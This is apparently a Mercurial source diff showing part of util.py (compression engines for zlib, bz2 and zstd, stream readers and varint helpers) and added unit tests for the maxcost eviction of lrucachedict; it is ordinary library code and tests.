3340 3362 Otherwise, returns ``compenginewireprotosupport`` with the following
3341 3363 fields:
3342 3364
3343 3365 * String format identifier
3344 3366 * Integer priority for the server
3345 3367 * Integer priority for the client
3346 3368
3347 3369 The integer priorities are used to order the advertisement of format
3348 3370 support by server and client. The highest integer is advertised
3349 3371 first. Integers with non-positive values aren't advertised.
3350 3372
3351 3373 The priority values are somewhat arbitrary and only used for default
3352 3374 ordering. The relative order can be changed via config options.
3353 3375
3354 3376 If wire protocol compression is supported, the class must also implement
3355 3377 ``compressstream`` and ``decompressorreader``.
3356 3378 """
3357 3379 return None
3358 3380
3359 3381 def revlogheader(self):
3360 3382 """Header added to revlog chunks that identifies this engine.
3361 3383
3362 3384 If this engine can be used to compress revlogs, this method should
3363 3385 return the bytes used to identify chunks compressed with this engine.
3364 3386 Else, the method should return ``None`` to indicate it does not
3365 3387 participate in revlog compression.
3366 3388 """
3367 3389 return None
3368 3390
3369 3391 def compressstream(self, it, opts=None):
3370 3392 """Compress an iterator of chunks.
3371 3393
3372 3394 The method receives an iterator (ideally a generator) of chunks of
3373 3395 bytes to be compressed. It returns an iterator (ideally a generator)
3374 3396 of bytes of chunks representing the compressed output.
3375 3397
3376 3398 Optionally accepts an argument defining how to perform compression.
3377 3399 Each engine treats this argument differently.
3378 3400 """
3379 3401 raise NotImplementedError()
3380 3402
3381 3403 def decompressorreader(self, fh):
3382 3404 """Perform decompression on a file object.
3383 3405
3384 3406 Argument is an object with a ``read(size)`` method that returns
3385 3407 compressed data. Return value is an object with a ``read(size)`` that
3386 3408 returns uncompressed data.
3387 3409 """
3388 3410 raise NotImplementedError()
3389 3411
3390 3412 def revlogcompressor(self, opts=None):
3391 3413 """Obtain an object that can be used to compress revlog entries.
3392 3414
3393 3415 The object has a ``compress(data)`` method that compresses binary
3394 3416 data. This method returns compressed binary data or ``None`` if
3395 3417 the data could not be compressed (too small, not compressible, etc).
3396 3418 The returned data should have a header uniquely identifying this
3397 3419 compression format so decompression can be routed to this engine.
3398 3420 This header should be identified by the ``revlogheader()`` return
3399 3421 value.
3400 3422
3401 3423 The object has a ``decompress(data)`` method that decompresses
3402 3424 data. The method will only be called if ``data`` begins with
3403 3425 ``revlogheader()``. The method should return the raw, uncompressed
3404 3426 data or raise a ``RevlogError``.
3405 3427
3406 3428 The object is reusable but is not thread safe.
3407 3429 """
3408 3430 raise NotImplementedError()
3409 3431
3410 3432 class _CompressedStreamReader(object):
3411 3433 def __init__(self, fh):
3412 3434 if safehasattr(fh, 'unbufferedread'):
3413 3435 self._reader = fh.unbufferedread
3414 3436 else:
3415 3437 self._reader = fh.read
3416 3438 self._pending = []
3417 3439 self._pos = 0
3418 3440 self._eof = False
3419 3441
3420 3442 def _decompress(self, chunk):
3421 3443 raise NotImplementedError()
3422 3444
3423 3445 def read(self, l):
3424 3446 buf = []
3425 3447 while True:
3426 3448 while self._pending:
3427 3449 if len(self._pending[0]) > l + self._pos:
3428 3450 newbuf = self._pending[0]
3429 3451 buf.append(newbuf[self._pos:self._pos + l])
3430 3452 self._pos += l
3431 3453 return ''.join(buf)
3432 3454
3433 3455 newbuf = self._pending.pop(0)
3434 3456 if self._pos:
3435 3457 buf.append(newbuf[self._pos:])
3436 3458 l -= len(newbuf) - self._pos
3437 3459 else:
3438 3460 buf.append(newbuf)
3439 3461 l -= len(newbuf)
3440 3462 self._pos = 0
3441 3463
3442 3464 if self._eof:
3443 3465 return ''.join(buf)
3444 3466 chunk = self._reader(65536)
3445 3467 self._decompress(chunk)
3446 3468 if not chunk and not self._pending and not self._eof:
3447 3469 # No progress and no new data, bail out
3448 3470 return ''.join(buf)
3449 3471
3450 3472 class _GzipCompressedStreamReader(_CompressedStreamReader):
3451 3473 def __init__(self, fh):
3452 3474 super(_GzipCompressedStreamReader, self).__init__(fh)
3453 3475 self._decompobj = zlib.decompressobj()
3454 3476 def _decompress(self, chunk):
3455 3477 newbuf = self._decompobj.decompress(chunk)
3456 3478 if newbuf:
3457 3479 self._pending.append(newbuf)
3458 3480 d = self._decompobj.copy()
3459 3481 try:
3460 3482 d.decompress('x')
3461 3483 d.flush()
3462 3484 if d.unused_data == 'x':
3463 3485 self._eof = True
3464 3486 except zlib.error:
3465 3487 pass
3466 3488
3467 3489 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3468 3490 def __init__(self, fh):
3469 3491 super(_BZ2CompressedStreamReader, self).__init__(fh)
3470 3492 self._decompobj = bz2.BZ2Decompressor()
3471 3493 def _decompress(self, chunk):
3472 3494 newbuf = self._decompobj.decompress(chunk)
3473 3495 if newbuf:
3474 3496 self._pending.append(newbuf)
3475 3497 try:
3476 3498 while True:
3477 3499 newbuf = self._decompobj.decompress('')
3478 3500 if newbuf:
3479 3501 self._pending.append(newbuf)
3480 3502 else:
3481 3503 break
3482 3504 except EOFError:
3483 3505 self._eof = True
3484 3506
3485 3507 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3486 3508 def __init__(self, fh):
3487 3509 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3488 3510 newbuf = self._decompobj.decompress('BZ')
3489 3511 if newbuf:
3490 3512 self._pending.append(newbuf)
3491 3513
3492 3514 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3493 3515 def __init__(self, fh, zstd):
3494 3516 super(_ZstdCompressedStreamReader, self).__init__(fh)
3495 3517 self._zstd = zstd
3496 3518 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3497 3519 def _decompress(self, chunk):
3498 3520 newbuf = self._decompobj.decompress(chunk)
3499 3521 if newbuf:
3500 3522 self._pending.append(newbuf)
3501 3523 try:
3502 3524 while True:
3503 3525 newbuf = self._decompobj.decompress('')
3504 3526 if newbuf:
3505 3527 self._pending.append(newbuf)
3506 3528 else:
3507 3529 break
3508 3530 except self._zstd.ZstdError:
3509 3531 self._eof = True
3510 3532
3511 3533 class _zlibengine(compressionengine):
3512 3534 def name(self):
3513 3535 return 'zlib'
3514 3536
3515 3537 def bundletype(self):
3516 3538 """zlib compression using the DEFLATE algorithm.
3517 3539
3518 3540 All Mercurial clients should support this format. The compression
3519 3541 algorithm strikes a reasonable balance between compression ratio
3520 3542 and size.
3521 3543 """
3522 3544 return 'gzip', 'GZ'
3523 3545
3524 3546 def wireprotosupport(self):
3525 3547 return compewireprotosupport('zlib', 20, 20)
3526 3548
3527 3549 def revlogheader(self):
3528 3550 return 'x'
3529 3551
3530 3552 def compressstream(self, it, opts=None):
3531 3553 opts = opts or {}
3532 3554
3533 3555 z = zlib.compressobj(opts.get('level', -1))
3534 3556 for chunk in it:
3535 3557 data = z.compress(chunk)
3536 3558 # Not all calls to compress emit data. It is cheaper to inspect
3537 3559 # here than to feed empty chunks through generator.
3538 3560 if data:
3539 3561 yield data
3540 3562
3541 3563 yield z.flush()
3542 3564
3543 3565 def decompressorreader(self, fh):
3544 3566 return _GzipCompressedStreamReader(fh)
3545 3567
3546 3568 class zlibrevlogcompressor(object):
3547 3569 def compress(self, data):
3548 3570 insize = len(data)
3549 3571 # Caller handles empty input case.
3550 3572 assert insize > 0
3551 3573
3552 3574 if insize < 44:
3553 3575 return None
3554 3576
3555 3577 elif insize <= 1000000:
3556 3578 compressed = zlib.compress(data)
3557 3579 if len(compressed) < insize:
3558 3580 return compressed
3559 3581 return None
3560 3582
3561 3583 # zlib makes an internal copy of the input buffer, doubling
3562 3584 # memory usage for large inputs. So do streaming compression
3563 3585 # on large inputs.
3564 3586 else:
3565 3587 z = zlib.compressobj()
3566 3588 parts = []
3567 3589 pos = 0
3568 3590 while pos < insize:
3569 3591 pos2 = pos + 2**20
3570 3592 parts.append(z.compress(data[pos:pos2]))
3571 3593 pos = pos2
3572 3594 parts.append(z.flush())
3573 3595
3574 3596 if sum(map(len, parts)) < insize:
3575 3597 return ''.join(parts)
3576 3598 return None
3577 3599
3578 3600 def decompress(self, data):
3579 3601 try:
3580 3602 return zlib.decompress(data)
3581 3603 except zlib.error as e:
3582 3604 raise error.RevlogError(_('revlog decompress error: %s') %
3583 3605 stringutil.forcebytestr(e))
3584 3606
3585 3607 def revlogcompressor(self, opts=None):
3586 3608 return self.zlibrevlogcompressor()
3587 3609
3588 3610 compengines.register(_zlibengine())
3589 3611
3590 3612 class _bz2engine(compressionengine):
3591 3613 def name(self):
3592 3614 return 'bz2'
3593 3615
3594 3616 def bundletype(self):
3595 3617 """An algorithm that produces smaller bundles than ``gzip``.
3596 3618
3597 3619 All Mercurial clients should support this format.
3598 3620
3599 3621 This engine will likely produce smaller bundles than ``gzip`` but
3600 3622 will be significantly slower, both during compression and
3601 3623 decompression.
3602 3624
3603 3625 If available, the ``zstd`` engine can yield similar or better
3604 3626 compression at much higher speeds.
3605 3627 """
3606 3628 return 'bzip2', 'BZ'
3607 3629
3608 3630 # We declare a protocol name but don't advertise by default because
3609 3631 # it is slow.
3610 3632 def wireprotosupport(self):
3611 3633 return compewireprotosupport('bzip2', 0, 0)
3612 3634
3613 3635 def compressstream(self, it, opts=None):
3614 3636 opts = opts or {}
3615 3637 z = bz2.BZ2Compressor(opts.get('level', 9))
3616 3638 for chunk in it:
3617 3639 data = z.compress(chunk)
3618 3640 if data:
3619 3641 yield data
3620 3642
3621 3643 yield z.flush()
3622 3644
3623 3645 def decompressorreader(self, fh):
3624 3646 return _BZ2CompressedStreamReader(fh)
3625 3647
3626 3648 compengines.register(_bz2engine())
3627 3649
3628 3650 class _truncatedbz2engine(compressionengine):
3629 3651 def name(self):
3630 3652 return 'bz2truncated'
3631 3653
3632 3654 def bundletype(self):
3633 3655 return None, '_truncatedBZ'
3634 3656
3635 3657 # We don't implement compressstream because it is hackily handled elsewhere.
3636 3658
3637 3659 def decompressorreader(self, fh):
3638 3660 return _TruncatedBZ2CompressedStreamReader(fh)
3639 3661
3640 3662 compengines.register(_truncatedbz2engine())
3641 3663
3642 3664 class _noopengine(compressionengine):
3643 3665 def name(self):
3644 3666 return 'none'
3645 3667
3646 3668 def bundletype(self):
3647 3669 """No compression is performed.
3648 3670
3649 3671 Use this compression engine to explicitly disable compression.
3650 3672 """
3651 3673 return 'none', 'UN'
3652 3674
3653 3675 # Clients always support uncompressed payloads. Servers don't because
3654 3676 # unless you are on a fast network, uncompressed payloads can easily
3655 3677 # saturate your network pipe.
3656 3678 def wireprotosupport(self):
3657 3679 return compewireprotosupport('none', 0, 10)
3658 3680
3659 3681 # We don't implement revlogheader because it is handled specially
3660 3682 # in the revlog class.
3661 3683
3662 3684 def compressstream(self, it, opts=None):
3663 3685 return it
3664 3686
3665 3687 def decompressorreader(self, fh):
3666 3688 return fh
3667 3689
3668 3690 class nooprevlogcompressor(object):
3669 3691 def compress(self, data):
3670 3692 return None
3671 3693
3672 3694 def revlogcompressor(self, opts=None):
3673 3695 return self.nooprevlogcompressor()
3674 3696
3675 3697 compengines.register(_noopengine())
3676 3698
3677 3699 class _zstdengine(compressionengine):
3678 3700 def name(self):
3679 3701 return 'zstd'
3680 3702
3681 3703 @propertycache
3682 3704 def _module(self):
3683 3705 # Not all installs have the zstd module available. So defer importing
3684 3706 # until first access.
3685 3707 try:
3686 3708 from . import zstd
3687 3709 # Force delayed import.
3688 3710 zstd.__version__
3689 3711 return zstd
3690 3712 except ImportError:
3691 3713 return None
3692 3714
3693 3715 def available(self):
3694 3716 return bool(self._module)
3695 3717
3696 3718 def bundletype(self):
3697 3719 """A modern compression algorithm that is fast and highly flexible.
3698 3720
3699 3721 Only supported by Mercurial 4.1 and newer clients.
3700 3722
3701 3723 With the default settings, zstd compression is both faster and yields
3702 3724 better compression than ``gzip``. It also frequently yields better
3703 3725 compression than ``bzip2`` while operating at much higher speeds.
3704 3726
3705 3727 If this engine is available and backwards compatibility is not a
3706 3728 concern, it is likely the best available engine.
3707 3729 """
3708 3730 return 'zstd', 'ZS'
3709 3731
3710 3732 def wireprotosupport(self):
3711 3733 return compewireprotosupport('zstd', 50, 50)
3712 3734
3713 3735 def revlogheader(self):
3714 3736 return '\x28'
3715 3737
3716 3738 def compressstream(self, it, opts=None):
3717 3739 opts = opts or {}
3718 3740 # zstd level 3 is almost always significantly faster than zlib
3719 3741 # while providing no worse compression. It strikes a good balance
3720 3742 # between speed and compression.
3721 3743 level = opts.get('level', 3)
3722 3744
3723 3745 zstd = self._module
3724 3746 z = zstd.ZstdCompressor(level=level).compressobj()
3725 3747 for chunk in it:
3726 3748 data = z.compress(chunk)
3727 3749 if data:
3728 3750 yield data
3729 3751
3730 3752 yield z.flush()
3731 3753
3732 3754 def decompressorreader(self, fh):
3733 3755 return _ZstdCompressedStreamReader(fh, self._module)
3734 3756
3735 3757 class zstdrevlogcompressor(object):
3736 3758 def __init__(self, zstd, level=3):
3737 3759 # TODO consider omitting frame magic to save 4 bytes.
3738 3760 # This writes content sizes into the frame header. That is
3739 3761 # extra storage. But it allows a correct size memory allocation
3740 3762 # to hold the result.
3741 3763 self._cctx = zstd.ZstdCompressor(level=level)
3742 3764 self._dctx = zstd.ZstdDecompressor()
3743 3765 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3744 3766 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3745 3767
3746 3768 def compress(self, data):
3747 3769 insize = len(data)
3748 3770 # Caller handles empty input case.
3749 3771 assert insize > 0
3750 3772
3751 3773 if insize < 50:
3752 3774 return None
3753 3775
3754 3776 elif insize <= 1000000:
3755 3777 compressed = self._cctx.compress(data)
3756 3778 if len(compressed) < insize:
3757 3779 return compressed
3758 3780 return None
3759 3781 else:
3760 3782 z = self._cctx.compressobj()
3761 3783 chunks = []
3762 3784 pos = 0
3763 3785 while pos < insize:
3764 3786 pos2 = pos + self._compinsize
3765 3787 chunk = z.compress(data[pos:pos2])
3766 3788 if chunk:
3767 3789 chunks.append(chunk)
3768 3790 pos = pos2
3769 3791 chunks.append(z.flush())
3770 3792
3771 3793 if sum(map(len, chunks)) < insize:
3772 3794 return ''.join(chunks)
3773 3795 return None
3774 3796
3775 3797 def decompress(self, data):
3776 3798 insize = len(data)
3777 3799
3778 3800 try:
3779 3801 # This was measured to be faster than other streaming
3780 3802 # decompressors.
3781 3803 dobj = self._dctx.decompressobj()
3782 3804 chunks = []
3783 3805 pos = 0
3784 3806 while pos < insize:
3785 3807 pos2 = pos + self._decompinsize
3786 3808 chunk = dobj.decompress(data[pos:pos2])
3787 3809 if chunk:
3788 3810 chunks.append(chunk)
3789 3811 pos = pos2
3790 3812 # Frame should be exhausted, so no finish() API.
3791 3813
3792 3814 return ''.join(chunks)
3793 3815 except Exception as e:
3794 3816 raise error.RevlogError(_('revlog decompress error: %s') %
3795 3817 stringutil.forcebytestr(e))
3796 3818
3797 3819 def revlogcompressor(self, opts=None):
3798 3820 opts = opts or {}
3799 3821 return self.zstdrevlogcompressor(self._module,
3800 3822 level=opts.get('level', 3))
3801 3823
3802 3824 compengines.register(_zstdengine())
3803 3825
3804 3826 def bundlecompressiontopics():
3805 3827 """Obtains a list of available bundle compressions for use in help."""
3806 3828 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3807 3829 items = {}
3808 3830
3809 3831 # We need to format the docstring. So use a dummy object/type to hold it
3810 3832 # rather than mutating the original.
3811 3833 class docobject(object):
3812 3834 pass
3813 3835
3814 3836 for name in compengines:
3815 3837 engine = compengines[name]
3816 3838
3817 3839 if not engine.available():
3818 3840 continue
3819 3841
3820 3842 bt = engine.bundletype()
3821 3843 if not bt or not bt[0]:
3822 3844 continue
3823 3845
3824 3846 doc = pycompat.sysstr('``%s``\n %s') % (
3825 3847 bt[0], engine.bundletype.__doc__)
3826 3848
3827 3849 value = docobject()
3828 3850 value.__doc__ = doc
3829 3851 value._origdoc = engine.bundletype.__doc__
3830 3852 value._origfunc = engine.bundletype
3831 3853
3832 3854 items[bt[0]] = value
3833 3855
3834 3856 return items
3835 3857
3836 3858 i18nfunctions = bundlecompressiontopics().values()
3837 3859
3838 3860 # convenient shortcut
3839 3861 dst = debugstacktrace
3840 3862
3841 3863 def safename(f, tag, ctx, others=None):
3842 3864 """
3843 3865 Generate a name that it is safe to rename f to in the given context.
3844 3866
3845 3867 f: filename to rename
3846 3868 tag: a string tag that will be included in the new name
3847 3869 ctx: a context, in which the new name must not exist
3848 3870 others: a set of other filenames that the new name must not be in
3849 3871
3850 3872 Returns a file name of the form oldname~tag[~number] which does not exist
3851 3873 in the provided context and is not in the set of other names.
3852 3874 """
3853 3875 if others is None:
3854 3876 others = set()
3855 3877
3856 3878 fn = '%s~%s' % (f, tag)
3857 3879 if fn not in ctx and fn not in others:
3858 3880 return fn
3859 3881 for n in itertools.count(1):
3860 3882 fn = '%s~%s~%s' % (f, tag, n)
3861 3883 if fn not in ctx and fn not in others:
3862 3884 return fn
3863 3885
3864 3886 def readexactly(stream, n):
3865 3887 '''read n bytes from stream.read and abort if less was available'''
3866 3888 s = stream.read(n)
3867 3889 if len(s) < n:
3868 3890 raise error.Abort(_("stream ended unexpectedly"
3869 3891 " (got %d bytes, expected %d)")
3870 3892 % (len(s), n))
3871 3893 return s
3872 3894
3873 3895 def uvarintencode(value):
3874 3896 """Encode an unsigned integer value to a varint.
3875 3897
3876 3898 A varint is a variable length integer of 1 or more bytes. Each byte
3877 3899 except the last has the most significant bit set. The lower 7 bits of
3878 3900 each byte store the 2's complement representation, least significant group
3879 3901 first.
3880 3902
3881 3903 >>> uvarintencode(0)
3882 3904 '\\x00'
3883 3905 >>> uvarintencode(1)
3884 3906 '\\x01'
3885 3907 >>> uvarintencode(127)
3886 3908 '\\x7f'
3887 3909 >>> uvarintencode(1337)
3888 3910 '\\xb9\\n'
3889 3911 >>> uvarintencode(65536)
3890 3912 '\\x80\\x80\\x04'
3891 3913 >>> uvarintencode(-1)
3892 3914 Traceback (most recent call last):
3893 3915 ...
3894 3916 ProgrammingError: negative value for uvarint: -1
3895 3917 """
3896 3918 if value < 0:
3897 3919 raise error.ProgrammingError('negative value for uvarint: %d'
3898 3920 % value)
3899 3921 bits = value & 0x7f
3900 3922 value >>= 7
3901 3923 bytes = []
3902 3924 while value:
3903 3925 bytes.append(pycompat.bytechr(0x80 | bits))
3904 3926 bits = value & 0x7f
3905 3927 value >>= 7
3906 3928 bytes.append(pycompat.bytechr(bits))
3907 3929
3908 3930 return ''.join(bytes)
3909 3931
3910 3932 def uvarintdecodestream(fh):
3911 3933 """Decode an unsigned variable length integer from a stream.
3912 3934
3913 3935 The passed argument is anything that has a ``.read(N)`` method.
3914 3936
3915 3937 >>> try:
3916 3938 ... from StringIO import StringIO as BytesIO
3917 3939 ... except ImportError:
3918 3940 ... from io import BytesIO
3919 3941 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3920 3942 0
3921 3943 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3922 3944 1
3923 3945 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3924 3946 127
3925 3947 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3926 3948 1337
3927 3949 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3928 3950 65536
3929 3951 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3930 3952 Traceback (most recent call last):
3931 3953 ...
3932 3954 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3933 3955 """
3934 3956 result = 0
3935 3957 shift = 0
3936 3958 while True:
3937 3959 byte = ord(readexactly(fh, 1))
3938 3960 result |= ((byte & 0x7f) << shift)
3939 3961 if not (byte & 0x80):
3940 3962 return result
3941 3963 shift += 7
@@ -1,221 +1,325 b''
1 1 from __future__ import absolute_import, print_function
2 2
3 3 import unittest
4 4
5 5 import silenttestrunner
6 6
7 7 from mercurial import (
8 8 util,
9 9 )
10 10
11 11 class testlrucachedict(unittest.TestCase):
12 12 def testsimple(self):
13 13 d = util.lrucachedict(4)
14 14 self.assertEqual(d.capacity, 4)
15 15 d.insert('a', 'va', cost=2)
16 16 d['b'] = 'vb'
17 17 d['c'] = 'vc'
18 18 d.insert('d', 'vd', cost=42)
19 19
20 20 self.assertEqual(d['a'], 'va')
21 21 self.assertEqual(d['b'], 'vb')
22 22 self.assertEqual(d['c'], 'vc')
23 23 self.assertEqual(d['d'], 'vd')
24 24
25 25 self.assertEqual(d.totalcost, 44)
26 26
27 27 # 'a' should be dropped because it was least recently used.
28 28 d['e'] = 've'
29 29 self.assertNotIn('a', d)
30 30 self.assertIsNone(d.get('a'))
31 31 self.assertEqual(d.totalcost, 42)
32 32
33 33 self.assertEqual(d['b'], 'vb')
34 34 self.assertEqual(d['c'], 'vc')
35 35 self.assertEqual(d['d'], 'vd')
36 36 self.assertEqual(d['e'], 've')
37 37
38 38 # Replacing item with different cost adjusts totalcost.
39 39 d.insert('e', 've', cost=4)
40 40 self.assertEqual(d.totalcost, 46)
41 41
42 42 # Touch entries in some order (both get and set).
43 43 d['e']
44 44 d['c'] = 'vc2'
45 45 d['d']
46 46 d['b'] = 'vb2'
47 47
48 48 # 'e' should be dropped now
49 49 d['f'] = 'vf'
50 50 self.assertNotIn('e', d)
51 51 self.assertEqual(d['b'], 'vb2')
52 52 self.assertEqual(d['c'], 'vc2')
53 53 self.assertEqual(d['d'], 'vd')
54 54 self.assertEqual(d['f'], 'vf')
55 55
56 56 d.clear()
57 57 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
58 58 self.assertNotIn(key, d)
59 59
60 60 def testunfull(self):
61 61 d = util.lrucachedict(4)
62 62 d['a'] = 1
63 63 d['b'] = 2
64 64 d['a']
65 65 d['b']
66 66
67 67 for key in ('a', 'b'):
68 68 self.assertIn(key, d)
69 69
70 70 def testcopypartial(self):
71 71 d = util.lrucachedict(4)
72 72 d.insert('a', 'va', cost=4)
73 73 d.insert('b', 'vb', cost=2)
74 74
75 75 dc = d.copy()
76 76
77 77 self.assertEqual(len(dc), 2)
78 78 self.assertEqual(dc.totalcost, 6)
79 79 for key in ('a', 'b'):
80 80 self.assertIn(key, dc)
81 81 self.assertEqual(dc[key], 'v%s' % key)
82 82
83 83 self.assertEqual(len(d), 2)
84 84 for key in ('a', 'b'):
85 85 self.assertIn(key, d)
86 86 self.assertEqual(d[key], 'v%s' % key)
87 87
88 88 d['c'] = 'vc'
89 89 del d['b']
90 90 self.assertEqual(d.totalcost, 4)
91 91 dc = d.copy()
92 92 self.assertEqual(len(dc), 2)
93 93 self.assertEqual(dc.totalcost, 4)
94 94 for key in ('a', 'c'):
95 95 self.assertIn(key, dc)
96 96 self.assertEqual(dc[key], 'v%s' % key)
97 97
98 98 def testcopyempty(self):
99 99 d = util.lrucachedict(4)
100 100 dc = d.copy()
101 101 self.assertEqual(len(dc), 0)
102 102
103 103 def testcopyfull(self):
104 104 d = util.lrucachedict(4)
105 105 d.insert('a', 'va', cost=42)
106 106 d['b'] = 'vb'
107 107 d['c'] = 'vc'
108 108 d['d'] = 'vd'
109 109
110 110 dc = d.copy()
111 111
112 112 for key in ('a', 'b', 'c', 'd'):
113 113 self.assertIn(key, dc)
114 114 self.assertEqual(dc[key], 'v%s' % key)
115 115
116 116 self.assertEqual(d.totalcost, 42)
117 117 self.assertEqual(dc.totalcost, 42)
118 118
119 119 # 'a' should be dropped because it was least recently used.
120 120 dc['e'] = 've'
121 121 self.assertNotIn('a', dc)
122 122 for key in ('b', 'c', 'd', 'e'):
123 123 self.assertIn(key, dc)
124 124 self.assertEqual(dc[key], 'v%s' % key)
125 125
126 126 self.assertEqual(d.totalcost, 42)
127 127 self.assertEqual(dc.totalcost, 0)
128 128
129 129 # Contents and order of original dict should remain unchanged.
130 130 dc['b'] = 'vb_new'
131 131
132 132 self.assertEqual(list(iter(d)), ['d', 'c', 'b', 'a'])
133 133 for key in ('a', 'b', 'c', 'd'):
134 134 self.assertEqual(d[key], 'v%s' % key)
135 135
136 d = util.lrucachedict(4, maxcost=42)
137 d.insert('a', 'va', cost=5)
138 d.insert('b', 'vb', cost=4)
139 d.insert('c', 'vc', cost=3)
140 dc = d.copy()
141 self.assertEqual(dc.maxcost, 42)
142 self.assertEqual(len(dc), 3)
143
144 # Max cost can be lowered as part of copy.
145 dc = d.copy(maxcost=10)
146 self.assertEqual(dc.maxcost, 10)
147 self.assertEqual(len(dc), 2)
148 self.assertEqual(dc.totalcost, 7)
149 self.assertIn('b', dc)
150 self.assertIn('c', dc)
151
136 152 def testcopydecreasecapacity(self):
137 153 d = util.lrucachedict(5)
138 154 d.insert('a', 'va', cost=4)
139 155 d.insert('b', 'vb', cost=2)
140 156 d['c'] = 'vc'
141 157 d['d'] = 'vd'
142 158
143 159 dc = d.copy(2)
144 160 self.assertEqual(dc.totalcost, 0)
145 161 for key in ('a', 'b'):
146 162 self.assertNotIn(key, dc)
147 163 for key in ('c', 'd'):
148 164 self.assertIn(key, dc)
149 165 self.assertEqual(dc[key], 'v%s' % key)
150 166
151 167 dc.insert('e', 've', cost=7)
152 168 self.assertEqual(dc.totalcost, 7)
153 169 self.assertNotIn('c', dc)
154 170 for key in ('d', 'e'):
155 171 self.assertIn(key, dc)
156 172 self.assertEqual(dc[key], 'v%s' % key)
157 173
158 174 # Original should remain unchanged.
159 175 self.assertEqual(d.totalcost, 6)
160 176 for key in ('a', 'b', 'c', 'd'):
161 177 self.assertIn(key, d)
162 178 self.assertEqual(d[key], 'v%s' % key)
163 179
164 180 def testcopyincreasecapacity(self):
165 181 d = util.lrucachedict(5)
166 182 d['a'] = 'va'
167 183 d['b'] = 'vb'
168 184 d['c'] = 'vc'
169 185 d['d'] = 'vd'
170 186
171 187 dc = d.copy(6)
172 188 for key in ('a', 'b', 'c', 'd'):
173 189 self.assertIn(key, dc)
174 190 self.assertEqual(dc[key], 'v%s' % key)
175 191
176 192 dc['e'] = 've'
177 193 dc['f'] = 'vf'
178 194 for key in ('a', 'b', 'c', 'd', 'e', 'f'):
179 195 self.assertIn(key, dc)
180 196 self.assertEqual(dc[key], 'v%s' % key)
181 197
182 198 dc['g'] = 'vg'
183 199 self.assertNotIn('a', dc)
184 200 for key in ('b', 'c', 'd', 'e', 'f', 'g'):
185 201 self.assertIn(key, dc)
186 202 self.assertEqual(dc[key], 'v%s' % key)
187 203
188 204 # Original should remain unchanged.
189 205 for key in ('a', 'b', 'c', 'd'):
190 206 self.assertIn(key, d)
191 207 self.assertEqual(d[key], 'v%s' % key)
192 208
193 209 def testpopoldest(self):
194 210 d = util.lrucachedict(4)
195 211 d.insert('a', 'va', cost=10)
196 212 d.insert('b', 'vb', cost=5)
197 213
198 214 self.assertEqual(len(d), 2)
199 215 self.assertEqual(d.popoldest(), ('a', 'va'))
200 216 self.assertEqual(len(d), 1)
201 217 self.assertEqual(d.totalcost, 5)
202 218 self.assertEqual(d.popoldest(), ('b', 'vb'))
203 219 self.assertEqual(len(d), 0)
204 220 self.assertEqual(d.totalcost, 0)
205 221 self.assertIsNone(d.popoldest())
206 222
207 223 d['a'] = 'va'
208 224 d['b'] = 'vb'
209 225 d['c'] = 'vc'
210 226 d['d'] = 'vd'
211 227
212 228 self.assertEqual(d.popoldest(), ('a', 'va'))
213 229 self.assertEqual(len(d), 3)
214 230 for key in ('b', 'c', 'd'):
215 231 self.assertEqual(d[key], 'v%s' % key)
216 232
217 233 d['a'] = 'va'
218 234 self.assertEqual(d.popoldest(), ('b', 'vb'))
219 235
236 def testmaxcost(self):
237 # Item cost is zero by default.
238 d = util.lrucachedict(6, maxcost=10)
239 d['a'] = 'va'
240 d['b'] = 'vb'
241 d['c'] = 'vc'
242 d['d'] = 'vd'
243 self.assertEqual(len(d), 4)
244 self.assertEqual(d.totalcost, 0)
245
246 d.clear()
247
248 # Insertion to exact cost threshold works without eviction.
249 d.insert('a', 'va', cost=6)
250 d.insert('b', 'vb', cost=4)
251
252 self.assertEqual(len(d), 2)
253 self.assertEqual(d['a'], 'va')
254 self.assertEqual(d['b'], 'vb')
255
256 # Inserting a new element with 0 cost works.
257 d['c'] = 'vc'
258 self.assertEqual(len(d), 3)
259
260 # Inserting a new element with cost putting us above high
261 # water mark evicts oldest single item.
262 d.insert('d', 'vd', cost=1)
263 self.assertEqual(len(d), 3)
264 self.assertEqual(d.totalcost, 5)
265 self.assertNotIn('a', d)
266 for key in ('b', 'c', 'd'):
267 self.assertEqual(d[key], 'v%s' % key)
268
269 # Inserting a new element with enough room for just itself
270 # evicts all items before.
271 d.insert('e', 've', cost=10)
272 self.assertEqual(len(d), 1)
273 self.assertEqual(d.totalcost, 10)
274 self.assertIn('e', d)
275
276 # Inserting a new element with cost greater than threshold
277 # still retains that item.
278 d.insert('f', 'vf', cost=11)
279 self.assertEqual(len(d), 1)
280 self.assertEqual(d.totalcost, 11)
281 self.assertIn('f', d)
282
283 # Inserting a new element will evict the last item since it is
284 # too large.
285 d['g'] = 'vg'
286 self.assertEqual(len(d), 1)
287 self.assertEqual(d.totalcost, 0)
288 self.assertIn('g', d)
289
290 d.clear()
291
292 d.insert('a', 'va', cost=7)
293 d.insert('b', 'vb', cost=3)
294 self.assertEqual(len(d), 2)
295
296 # Replacing a value with smaller cost won't result in eviction.
297 d.insert('b', 'vb2', cost=2)
298 self.assertEqual(len(d), 2)
299
300 # Replacing a value with a higher cost will evict when threshold
301 # exceeded.
302 d.insert('b', 'vb3', cost=4)
303 self.assertEqual(len(d), 1)
304 self.assertNotIn('a', d)
305
306 def testmaxcostcomplex(self):
307 d = util.lrucachedict(100, maxcost=100)
308 d.insert('a', 'va', cost=9)
309 d.insert('b', 'vb', cost=21)
310 d.insert('c', 'vc', cost=7)
311 d.insert('d', 'vc', cost=50)
312 self.assertEqual(d.totalcost, 87)
313
314 # Inserting new element should free multiple elements so we hit
315 # low water mark.
316 d.insert('e', 'vd', cost=25)
317 self.assertEqual(len(d), 3)
